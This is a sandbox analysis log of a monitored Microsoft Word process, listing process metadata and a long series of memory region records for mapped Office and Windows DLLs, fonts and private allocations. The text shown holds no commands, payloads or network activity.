# Flog Txt Version 1
# Analyzer Version: 4.4.0
# Analyzer Build Date: Dec 8 2021 20:04:45
# Log Creation Date: 31.12.2021 11:49:02.139
Process:
id = "1"
image_name = "winword.exe"
filename = "c:\\program files (x86)\\microsoft office\\root\\office16\\winword.exe"
page_root = "0x4b210000"
os_pid = "0xd5c"
os_integrity_level = "0x2000"
os_privileges = "0x800000"
monitor_reason = "analysis_target"
parent_id = "0"
os_parent_pid = "0x390"
cmd_line = "\"C:\\Program Files (x86)\\Microsoft Office\\Root\\Office16\\WINWORD.EXE\" /n"
cur_dir = "C:\\Users\\kEecfMwgj\\Desktop\\"
os_username = "Q9IATRKPRH\\kEecfMwgj"
bitness = "32"
os_groups = "Q9IATRKPRH\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e771" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]
Region:
id = 250
start_va = 0x10000
end_va = 0x1ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000010000"
filename = ""
Region:
id = 251
start_va = 0x20000
end_va = 0x20fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000020000"
filename = ""
Region:
id = 252
start_va = 0x30000
end_va = 0x30fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000030000"
filename = ""
Region:
id = 253
start_va = 0x40000
end_va = 0x40fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "apisetschema.dll"
filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll")
Region:
id = 254
start_va = 0x50000
end_va = 0x53fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000050000"
filename = ""
Region:
id = 255
start_va = 0x60000
end_va = 0x63fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000060000"
filename = ""
Region:
id = 256
start_va = 0x70000
end_va = 0xd6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "locale.nls"
filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")
Region:
id = 257
start_va = 0xe0000
end_va = 0xe0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000000e0000"
filename = ""
Region:
id = 258
start_va = 0xf0000
end_va = 0xf0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000000f0000"
filename = ""
Region:
id = 259
start_va = 0x100000
end_va = 0x100fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000100000"
filename = ""
Region:
id = 260
start_va = 0x110000
end_va = 0x110fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000110000"
filename = ""
Region:
id = 261
start_va = 0x120000
end_va = 0x120fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000120000"
filename = ""
Region:
id = 262
start_va = 0x130000
end_va = 0x131fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000130000"
filename = ""
Region:
id = 263
start_va = 0x140000
end_va = 0x141fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000140000"
filename = ""
Region:
id = 264
start_va = 0x150000
end_va = 0x18ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000150000"
filename = ""
Region:
id = 265
start_va = 0x190000
end_va = 0x192fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000190000"
filename = ""
Region:
id = 266
start_va = 0x1a0000
end_va = 0x1affff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000001a0000"
filename = ""
Region:
id = 267
start_va = 0x1b0000
end_va = 0x1b2fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000001b0000"
filename = ""
Region:
id = 268
start_va = 0x1c0000
end_va = 0x1c2fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000001c0000"
filename = ""
Region:
id = 269
start_va = 0x1d0000
end_va = 0x1d2fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000001d0000"
filename = ""
Region:
id = 270
start_va = 0x1e0000
end_va = 0x1e2fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000001e0000"
filename = ""
Region:
id = 271
start_va = 0x1f0000
end_va = 0x20ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000001f0000"
filename = ""
Region:
id = 272
start_va = 0x220000
end_va = 0x31ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000220000"
filename = ""
Region:
id = 273
start_va = 0x320000
end_va = 0x4a7fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000320000"
filename = ""
Region:
id = 274
start_va = 0x4b0000
end_va = 0x4b1fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000004b0000"
filename = ""
Region:
id = 275
start_va = 0x4e0000
end_va = 0x55ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000004e0000"
filename = ""
Region:
id = 276
start_va = 0x560000
end_va = 0x6e0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000560000"
filename = ""
Region:
id = 277
start_va = 0x710000
end_va = 0x710fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000710000"
filename = ""
Region:
id = 278
start_va = 0x720000
end_va = 0x81ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000720000"
filename = ""
Region:
id = 279
start_va = 0x820000
end_va = 0x8fefff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000820000"
filename = ""
Region:
id = 280
start_va = 0x900000
end_va = 0x90ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000900000"
filename = ""
Region:
id = 281
start_va = 0x910000
end_va = 0xa0ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000910000"
filename = ""
Region:
id = 282
start_va = 0xa10000
end_va = 0xa1ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000a10000"
filename = ""
Region:
id = 283
start_va = 0xa20000
end_va = 0xceefff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "sortdefault.nls"
filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")
Region:
id = 284
start_va = 0xd20000
end_va = 0xd23fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000d20000"
filename = ""
Region:
id = 285
start_va = 0xd30000
end_va = 0xd6ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000d30000"
filename = ""
Region:
id = 286
start_va = 0xd70000
end_va = 0xe6ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000d70000"
filename = ""
Region:
id = 287
start_va = 0xe70000
end_va = 0xe70fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000e70000"
filename = ""
Region:
id = 288
start_va = 0xe80000
end_va = 0xe80fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000e80000"
filename = ""
Region:
id = 289
start_va = 0xe90000
end_va = 0xe94fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "user32.dll.mui"
filename = "\\Windows\\SysWOW64\\en-US\\user32.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\user32.dll.mui")
Region:
id = 290
start_va = 0xea0000
end_va = 0xea0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000ea0000"
filename = ""
Region:
id = 291
start_va = 0xeb0000
end_va = 0xeb1fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000eb0000"
filename = ""
Region:
id = 292
start_va = 0xec0000
end_va = 0xeccfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "setupapi.dll.mui"
filename = "\\Windows\\SysWOW64\\en-US\\setupapi.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\setupapi.dll.mui")
Region:
id = 293
start_va = 0xed0000
end_va = 0xf0ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000ed0000"
filename = ""
Region:
id = 294
start_va = 0xf50000
end_va = 0xf8ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000f50000"
filename = ""
Region:
id = 295
start_va = 0xf90000
end_va = 0xfcffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000f90000"
filename = ""
Region:
id = 296
start_va = 0xfd0000
end_va = 0xfd0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "msxml6r.dll"
filename = "\\Windows\\SysWOW64\\msxml6r.dll" (normalized: "c:\\windows\\syswow64\\msxml6r.dll")
Region:
id = 297
start_va = 0xfe0000
end_va = 0xff6fff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000007.db"
filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000007.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000007.db")
Region:
id = 298
start_va = 0x1000000
end_va = 0x11d8fff
monitored = 0
entry_point = 0x1001000
region_type = mapped_file
name = "winword.exe"
filename = "\\Program Files (x86)\\Microsoft Office\\root\\Office16\\WINWORD.EXE" (normalized: "c:\\program files (x86)\\microsoft office\\root\\office16\\winword.exe")
Region:
id = 299
start_va = 0x11e0000
end_va = 0x25dffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000011e0000"
filename = ""
Region:
id = 300
start_va = 0x25e0000
end_va = 0x31d1fff
monitored = 0
entry_point = 0x25e1000
region_type = mapped_file
name = "oart.dll"
filename = "\\Program Files (x86)\\Microsoft Office\\root\\Office16\\OART.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\root\\office16\\oart.dll")
Region:
id = 301
start_va = 0x3250000
end_va = 0x3250fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000003250000"
filename = ""
Region:
id = 302
start_va = 0x3260000
end_va = 0x3260fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000003260000"
filename = ""
Region:
id = 303
start_va = 0x3270000
end_va = 0x336ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000003270000"
filename = ""
Region:
id = 304
start_va = 0x3370000
end_va = 0x3371fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000003370000"
filename = ""
Region:
id = 305
start_va = 0x3380000
end_va = 0x347ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000003380000"
filename = ""
Region:
id = 306
start_va = 0x3480000
end_va = 0x353ffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "kernelbase.dll.mui"
filename = "\\Windows\\SysWOW64\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\kernelbase.dll.mui")
Region:
id = 307
start_va = 0x3540000
end_va = 0x357ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000003540000"
filename = ""
Region:
id = 308
start_va = 0x3590000
end_va = 0x35cffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000003590000"
filename = ""
Region:
id = 309
start_va = 0x35d0000
end_va = 0x35e0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "c_1255.nls"
filename = "\\Windows\\System32\\C_1255.NLS" (normalized: "c:\\windows\\system32\\c_1255.nls")
Region:
id = 310
start_va = 0x3630000
end_va = 0x363ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000003630000"
filename = ""
Region:
id = 311
start_va = 0x3670000
end_va = 0x36affff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000003670000"
filename = ""
Region:
id = 312
start_va = 0x3810000
end_va = 0x384ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000003810000"
filename = ""
Region:
id = 313
start_va = 0x3860000
end_va = 0x389ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000003860000"
filename = ""
Region:
id = 314
start_va = 0x38a0000
end_va = 0x399ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000038a0000"
filename = ""
Region:
id = 315
start_va = 0x39a0000
end_va = 0x3a1ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000039a0000"
filename = ""
Region:
id = 316
start_va = 0x3a20000
end_va = 0x3a5ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000003a20000"
filename = ""
Region:
id = 317
start_va = 0x3be0000
end_va = 0x3c1ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000003be0000"
filename = ""
Region:
id = 318
start_va = 0x3c40000
end_va = 0x3d3ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000003c40000"
filename = ""
Region:
id = 319
start_va = 0x3d40000
end_va = 0x413ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000003d40000"
filename = ""
Region:
id = 320
start_va = 0x4140000
end_va = 0x4a6ffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "staticcache.dat"
filename = "\\Windows\\Fonts\\StaticCache.dat" (normalized: "c:\\windows\\fonts\\staticcache.dat")
Region:
id = 321
start_va = 0x4a70000
end_va = 0x4aaffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004a70000"
filename = ""
Region:
id = 322
start_va = 0x4b20000
end_va = 0x4c1ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004b20000"
filename = ""
Region:
id = 323
start_va = 0x4c60000
end_va = 0x4c9ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004c60000"
filename = ""
Region:
id = 324
start_va = 0x4cd0000
end_va = 0x4dcffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004cd0000"
filename = ""
Region:
id = 325
start_va = 0x4dd0000
end_va = 0x4e4efff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "segoeui.ttf"
filename = "\\Windows\\Fonts\\segoeui.ttf" (normalized: "c:\\windows\\fonts\\segoeui.ttf")
Region:
id = 326
start_va = 0x4e50000
end_va = 0x4e8ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004e50000"
filename = ""
Region:
id = 327
start_va = 0x4f10000
end_va = 0x4f1ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004f10000"
filename = ""
Region:
id = 328
start_va = 0x4f20000
end_va = 0x571ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000004f20000"
filename = ""
Region:
id = 329
start_va = 0x5720000
end_va = 0x581ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005720000"
filename = ""
Region:
id = 330
start_va = 0x5840000
end_va = 0x584ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005840000"
filename = ""
Region:
id = 331
start_va = 0x58c0000
end_va = 0x59bffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000058c0000"
filename = ""
Region:
id = 332
start_va = 0x59d0000
end_va = 0x5acffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000059d0000"
filename = ""
Region:
id = 333
start_va = 0x5ad0000
end_va = 0x5ccffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005ad0000"
filename = ""
Region:
id = 334
start_va = 0x5cd0000
end_va = 0x5d7afff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tahoma.ttf"
filename = "\\Windows\\Fonts\\tahoma.ttf" (normalized: "c:\\windows\\fonts\\tahoma.ttf")
Region:
id = 335
start_va = 0x5e00000
end_va = 0x5efffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005e00000"
filename = ""
Region:
id = 336
start_va = 0x5f00000
end_va = 0x5fbcfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "arial.ttf"
filename = "\\Windows\\Fonts\\arial.ttf" (normalized: "c:\\windows\\fonts\\arial.ttf")
Region:
id = 337
start_va = 0x6030000
end_va = 0x606ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000006030000"
filename = ""
Region:
id = 338
start_va = 0x6070000
end_va = 0x607ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000006070000"
filename = ""
Region:
id = 339
start_va = 0x60f0000
end_va = 0x61effff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000060f0000"
filename = ""
Region:
id = 340
start_va = 0x61f0000
end_va = 0x65effff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000061f0000"
filename = ""
Region:
id = 341
start_va = 0x65f0000
end_va = 0x66c8fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000065f0000"
filename = ""
Region:
id = 342
start_va = 0x6750000
end_va = 0x678ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000006750000"
filename = ""
Region:
id = 343
start_va = 0x6910000
end_va = 0x694ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000006910000"
filename = ""
Region:
id = 344
start_va = 0x6950000
end_va = 0x6d4ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000006950000"
filename = ""
Region:
id = 345
start_va = 0x6d50000
end_va = 0x714ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000006d50000"
filename = ""
Region:
id = 346
start_va = 0x7150000
end_va = 0x794ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000007150000"
filename = ""
Region:
id = 347
start_va = 0x7950000
end_va = 0x7d50fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007950000"
filename = ""
Region:
id = 348
start_va = 0x7d60000
end_va = 0x8160fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000007d60000"
filename = ""
Region:
id = 349
start_va = 0x8170000
end_va = 0x8570fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000008170000"
filename = ""
Region:
id = 350
start_va = 0x8580000
end_va = 0x877ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000008580000"
filename = ""
Region:
id = 351
start_va = 0x8780000
end_va = 0x8b7ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000008780000"
filename = ""
Region:
id = 352
start_va = 0x373d0000
end_va = 0x373dffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000373d0000"
filename = ""
Region:
id = 353
start_va = 0x66dd0000
end_va = 0x675c4fff
monitored = 0
entry_point = 0x66e35279
region_type = mapped_file
name = "chart.dll"
filename = "\\Program Files (x86)\\Microsoft Office\\root\\Office16\\CHART.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\root\\office16\\chart.dll")
Region:
id = 354
start_va = 0x675d0000
end_va = 0x67727fff
monitored = 0
entry_point = 0x675d133c
region_type = mapped_file
name = "msxml6.dll"
filename = "\\Windows\\SysWOW64\\msxml6.dll" (normalized: "c:\\windows\\syswow64\\msxml6.dll")
Region:
id = 355
start_va = 0x67730000
end_va = 0x67780fff
monitored = 0
entry_point = 0x6775988c
region_type = mapped_file
name = "winspool.drv"
filename = "\\Windows\\SysWOW64\\winspool.drv" (normalized: "c:\\windows\\syswow64\\winspool.drv")
Region:
id = 356
start_va = 0x67790000
end_va = 0x677bcfff
monitored = 0
entry_point = 0x677a62dc
region_type = mapped_file
name = "osppc.dll"
filename = "\\Program Files (x86)\\Common Files\\microsoft shared\\OfficeSoftwareProtectionPlatform\\OSPPC.DLL" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\officesoftwareprotectionplatform\\osppc.dll")
Region:
id = 357
start_va = 0x677c0000
end_va = 0x677c7fff
monitored = 0
entry_point = 0x677c2ca6
region_type = mapped_file
name = "npmproxy.dll"
filename = "\\Windows\\SysWOW64\\npmproxy.dll" (normalized: "c:\\windows\\syswow64\\npmproxy.dll")
Region:
id = 358
start_va = 0x677d0000
end_va = 0x67829fff
monitored = 0
entry_point = 0x677d1f35
region_type = mapped_file
name = "netprofm.dll"
filename = "\\Windows\\SysWOW64\\netprofm.dll" (normalized: "c:\\windows\\syswow64\\netprofm.dll")
Region:
id = 359
start_va = 0x67830000
end_va = 0x679d1fff
monitored = 0
entry_point = 0x67831000
region_type = mapped_file
name = "riched20.dll"
filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX86\\Microsoft Shared\\OFFICE16\\RICHED20.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilescommonx86\\microsoft shared\\office16\\riched20.dll")
Region:
id = 360
start_va = 0x679e0000
end_va = 0x67a6cfff
monitored = 1
entry_point = 0x679f2860
region_type = mapped_file
name = "mscoreei.dll"
filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscoreei.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\mscoreei.dll")
Region:
id = 361
start_va = 0x67a70000
end_va = 0x67ab9fff
monitored = 1
entry_point = 0x67a72e54
region_type = mapped_file
name = "mscoree.dll"
filename = "\\Windows\\SysWOW64\\mscoree.dll" (normalized: "c:\\windows\\syswow64\\mscoree.dll")
Region:
id = 362
start_va = 0x67ac0000
end_va = 0x67ac7fff
monitored = 0
entry_point = 0x67ac10e9
region_type = mapped_file
name = "secur32.dll"
filename = "\\Windows\\SysWOW64\\secur32.dll" (normalized: "c:\\windows\\syswow64\\secur32.dll")
Region:
id = 363
start_va = 0x67ad0000
end_va = 0x67bcafff
monitored = 0
entry_point = 0x67ae17e1
region_type = mapped_file
name = "windowscodecs.dll"
filename = "\\Windows\\SysWOW64\\WindowsCodecs.dll" (normalized: "c:\\windows\\syswow64\\windowscodecs.dll")
Region:
id = 364
start_va = 0x67bd0000
end_va = 0x67cd9fff
monitored = 0
entry_point = 0x67c6146c
region_type = mapped_file
name = "dwrite.dll"
filename = "\\Windows\\SysWOW64\\DWrite.dll" (normalized: "c:\\windows\\syswow64\\dwrite.dll")
Region:
id = 365
start_va = 0x67ce0000
end_va = 0x67e0bfff
monitored = 0
entry_point = 0x67de5cf2
region_type = mapped_file
name = "d3d10warp.dll"
filename = "\\Windows\\SysWOW64\\d3d10warp.dll" (normalized: "c:\\windows\\syswow64\\d3d10warp.dll")
Region:
id = 366
start_va = 0x67e10000
end_va = 0x67e49fff
monitored = 0
entry_point = 0x67e2fab7
region_type = mapped_file
name = "d3d10_1core.dll"
filename = "\\Windows\\SysWOW64\\d3d10_1core.dll" (normalized: "c:\\windows\\syswow64\\d3d10_1core.dll")
Region:
id = 367
start_va = 0x67e50000
end_va = 0x67e7bfff
monitored = 0
entry_point = 0x67e701f8
region_type = mapped_file
name = "d3d10_1.dll"
filename = "\\Windows\\SysWOW64\\d3d10_1.dll" (normalized: "c:\\windows\\syswow64\\d3d10_1.dll")
Region:
id = 368
start_va = 0x67e80000
end_va = 0x67f97fff
monitored = 0
entry_point = 0x67e840b1
region_type = mapped_file
name = "msptls.dll"
filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX86\\Microsoft Shared\\OFFICE16\\MSPTLS.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilescommonx86\\microsoft shared\\office16\\msptls.dll")
Region:
id = 369
start_va = 0x67fa0000
end_va = 0x68114fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "msointl.dll"
filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX86\\Microsoft Shared\\OFFICE16\\1033\\MSOINTL.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilescommonx86\\microsoft shared\\office16\\1033\\msointl.dll")
Region:
id = 370
start_va = 0x68120000
end_va = 0x6812efff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "msointl30.dll"
filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX86\\Microsoft Shared\\OFFICE16\\1033\\msointl30.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilescommonx86\\microsoft shared\\office16\\1033\\msointl30.dll")
Region:
id = 371
start_va = 0x68130000
end_va = 0x681d8fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "wwintl.dll"
filename = "\\Program Files (x86)\\Microsoft Office\\root\\Office16\\1033\\WWINTL.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\root\\office16\\1033\\wwintl.dll")
Region:
id = 372
start_va = 0x681e0000
end_va = 0x6d01efff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "msores.dll"
filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX86\\Microsoft Shared\\OFFICE16\\MSORES.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilescommonx86\\microsoft shared\\office16\\msores.dll")
Region:
id = 373
start_va = 0x6d020000
end_va = 0x6d940fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "mso99lres.dll"
filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX86\\Microsoft Shared\\OFFICE16\\MSO99LRES.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilescommonx86\\microsoft shared\\office16\\mso99lres.dll")
Region:
id = 374
start_va = 0x6d950000
end_va = 0x6dc57fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "mso40uires.dll"
filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX86\\Microsoft Shared\\OFFICE16\\MSO40UIRES.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilescommonx86\\microsoft shared\\office16\\mso40uires.dll")
Region:
id = 375
start_va = 0x6dc60000
end_va = 0x6dc88fff
monitored = 0
entry_point = 0x6dc66b19
region_type = mapped_file
name = "winsta.dll"
filename = "\\Windows\\SysWOW64\\winsta.dll" (normalized: "c:\\windows\\syswow64\\winsta.dll")
Region:
id = 376
start_va = 0x6dc90000
end_va = 0x6dc9cfff
monitored = 0
entry_point = 0x6dc911e0
region_type = mapped_file
name = "wtsapi32.dll"
filename = "\\Windows\\SysWOW64\\wtsapi32.dll" (normalized: "c:\\windows\\syswow64\\wtsapi32.dll")
Region:
id = 377
start_va = 0x6dca0000
end_va = 0x6dd59fff
monitored = 0
entry_point = 0x6dd0253f
region_type = mapped_file
name = "d2d1.dll"
filename = "\\Windows\\SysWOW64\\d2d1.dll" (normalized: "c:\\windows\\syswow64\\d2d1.dll")
Region:
id = 378
start_va = 0x6dd60000
end_va = 0x6eb11fff
monitored = 0
entry_point = 0x6dd61000
region_type = mapped_file
name = "mso.dll"
filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX86\\Microsoft Shared\\OFFICE16\\MSO.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilescommonx86\\microsoft shared\\office16\\mso.dll")
Region:
id = 379
start_va = 0x6eb20000
end_va = 0x6eb40fff
monitored = 0
entry_point = 0x6eb2c008
region_type = mapped_file
name = "sppc.dll"
filename = "\\Windows\\SysWOW64\\sppc.dll" (normalized: "c:\\windows\\syswow64\\sppc.dll")
Region:
id = 380
start_va = 0x6eb50000
end_va = 0x6eb59fff
monitored = 0
entry_point = 0x6eb54d20
region_type = mapped_file
name = "slc.dll"
filename = "\\Windows\\SysWOW64\\slc.dll" (normalized: "c:\\windows\\syswow64\\slc.dll")
Region:
id = 381
start_va = 0x6eb60000
end_va = 0x6f0f7fff
monitored = 0
entry_point = 0x6eb61000
region_type = mapped_file
name = "mso99lwin32client.dll"
filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX86\\Microsoft Shared\\OFFICE16\\Mso99Lwin32client.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilescommonx86\\microsoft shared\\office16\\mso99lwin32client.dll")
Region:
id = 382
start_va = 0x6f100000
end_va = 0x6f814fff
monitored = 0
entry_point = 0x6f101000
region_type = mapped_file
name = "mso40uiwin32client.dll"
filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX86\\Microsoft Shared\\OFFICE16\\Mso40UIwin32client.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilescommonx86\\microsoft shared\\office16\\mso40uiwin32client.dll")
Region:
id = 383
start_va = 0x6f820000
end_va = 0x6fb21fff
monitored = 0
entry_point = 0x6f821000
region_type = mapped_file
name = "mso30win32client.dll"
